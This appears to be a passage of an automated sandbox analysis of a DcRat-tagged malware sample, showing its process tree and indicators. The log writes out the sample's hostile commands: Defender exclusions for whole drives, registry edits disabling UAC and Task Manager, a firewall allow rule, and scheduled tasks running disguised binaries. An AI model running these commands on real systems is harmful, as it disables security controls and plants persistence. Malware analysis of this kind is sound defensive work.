pid Process 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe 4976 ExInjector.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4976 ExInjector.exe 2804 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: SeDebugPrivilege 4100 SystemUpdates.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 4320 dwm.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: SeBackupPrivilege 4604 vssvc.exe Token: SeRestorePrivilege 4604 vssvc.exe Token: SeAuditPrivilege 4604 vssvc.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe Token: SeIncBasePriorityPrivilege 4976 ExInjector.exe Token: 33 4976 ExInjector.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 2820 sihost.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 4732 msedge.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe 2804 explorer.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1188 Injector.exe 2804 explorer.exe 1032 SearchHost.exe 1392 StartMenuExperienceHost.exe 2804 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3888 wrote to memory of 1188 3888 PedikClient.exe 79 PID 3888 wrote to memory of 1188 3888 PedikClient.exe 79 PID 3888 wrote to memory of 1188 3888 PedikClient.exe 79 PID 1188 wrote to memory of 4540 1188 Injector.exe 82 PID 1188 wrote to memory of 4540 1188 Injector.exe 82 PID 1188 wrote to memory of 4540 1188 Injector.exe 82 PID 3888 wrote to memory of 4976 3888 PedikClient.exe 83 PID 3888 wrote to memory of 4976 3888 PedikClient.exe 83 PID 3888 wrote to memory of 4976 3888 PedikClient.exe 83 PID 4976 wrote to memory of 2872 4976 ExInjector.exe 85 PID 4976 wrote to memory of 2872 4976 ExInjector.exe 85 PID 4976 wrote to memory of 2872 4976 ExInjector.exe 85 PID 4540 wrote to memory of 2552 4540 WScript.exe 88 PID 4540 wrote to memory of 2552 4540 WScript.exe 88 PID 4540 wrote to memory of 2552 4540 WScript.exe 88 PID 2552 wrote to memory of 4100 2552 cmd.exe 90 PID 2552 wrote to memory of 4100 2552 cmd.exe 90 PID 4100 wrote to memory of 4836 4100 SystemUpdates.exe 100 PID 4100 wrote to memory of 4836 4100 SystemUpdates.exe 100 PID 4100 wrote to memory of 4892 4100 SystemUpdates.exe 101 PID 4100 wrote to memory of 4892 4100 SystemUpdates.exe 101 PID 4100 wrote to memory of 4480 4100 SystemUpdates.exe 102 PID 4100 wrote to memory of 4480 4100 SystemUpdates.exe 102 PID 4100 wrote to memory of 4668 4100 SystemUpdates.exe 103 PID 4100 wrote to memory of 4668 4100 SystemUpdates.exe 103 PID 4100 wrote to memory of 4060 4100 SystemUpdates.exe 104 PID 4100 wrote to memory of 4060 4100 SystemUpdates.exe 104 PID 4100 wrote to memory of 4848 4100 SystemUpdates.exe 105 PID 4100 wrote to memory of 4848 4100 SystemUpdates.exe 105 PID 4100 wrote to memory of 1808 4100 SystemUpdates.exe 106 PID 4100 wrote to memory of 1808 4100 SystemUpdates.exe 106 PID 4100 wrote to memory of 3340 4100 SystemUpdates.exe 107 PID 4100 wrote to memory of 3340 4100 SystemUpdates.exe 107 PID 4100 wrote to memory of 4736 4100 SystemUpdates.exe 108 PID 4100 wrote to memory of 4736 4100 SystemUpdates.exe 108 PID 4100 wrote to memory of 1668 4100 SystemUpdates.exe 109 PID 4100 wrote to memory of 1668 4100 SystemUpdates.exe 109 PID 4100 wrote to memory of 4928 4100 SystemUpdates.exe 110 PID 4100 wrote to memory of 4928 4100 SystemUpdates.exe 110 PID 4100 wrote to memory of 4320 4100 SystemUpdates.exe 122 PID 4100 wrote to memory of 4320 4100 SystemUpdates.exe 122 PID 2552 wrote to memory of 1048 2552 cmd.exe 123 PID 2552 wrote to memory of 1048 2552 cmd.exe 123 PID 2552 wrote to memory of 1048 2552 cmd.exe 123 PID 4320 wrote to memory of 2472 4320 dwm.exe 124 PID 4320 wrote to memory of 2472 4320 dwm.exe 124 PID 4320 wrote to memory of 1328 4320 dwm.exe 125 PID 4320 wrote to memory of 1328 4320 dwm.exe 125 PID 4320 wrote to memory of 4732 4320 dwm.exe 129 PID 4320 wrote to memory of 4732 4320 dwm.exe 129 PID 4732 wrote to memory of 1388 4732 msedge.exe 130 PID 4732 wrote to memory of 1388 4732 msedge.exe 130 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 PID 4732 wrote to memory of 1992 4732 msedge.exe 131 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" dwm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" dwm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" SystemUpdates.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" SystemUpdates.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" SystemUpdates.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" dwm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\PedikClient.exe"C:\Users\Admin\AppData\Local\Temp\PedikClient.exe"1⤵
- DcRat
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Injector.exe"2⤵
- DcRat
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Pj3sASAQmYbZO22AgnND3YNrHBGc.vbe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\System32\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\SystemUpdates.exe"C:\Windows\System32\SystemUpdates.exe"5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Program Files (x86)\Google\dwm.exe"C:\Program Files (x86)\Google\dwm.exe"6⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4320 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da189635-e194-4091-ac06-732c716850a2.vbs"7⤵PID:2472
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bfb84b27-316d-47b6-a319-30e6d6186c3e.vbs"7⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://localhost:12587/7⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbd2a83cb8,0x7ffbd2a83cc8,0x7ffbd2a83cd88⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2060 /prefetch:28⤵PID:1992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:38⤵PID:3860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:88⤵PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:18⤵PID:1900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:18⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:18⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:18⤵PID:3088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 /prefetch:88⤵PID:1452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:18⤵PID:1640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:18⤵PID:4040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:18⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:88⤵PID:712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:18⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:18⤵PID:4348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,6502287001630534725,15474451292414147292,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:18⤵PID:1532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qzqLwOyuSO.bat" "7⤵PID:2448
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3864
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1048
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExInjector.exe" "ExInjector.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2872
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\sysmon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\SendTo\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2120
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4796
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
